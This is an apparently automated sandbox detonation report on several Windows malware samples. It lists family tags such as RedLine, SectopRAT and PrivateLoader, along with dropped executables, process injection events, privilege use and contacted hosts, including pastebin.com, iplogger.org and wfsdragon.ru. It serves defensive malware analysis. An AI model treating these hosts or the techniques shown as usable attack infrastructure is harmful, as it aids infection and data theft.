Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe

"C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 t.gogamec.com udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0944361c3621a67a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09d761ab4704dd931.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09d761ab4704dd931.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
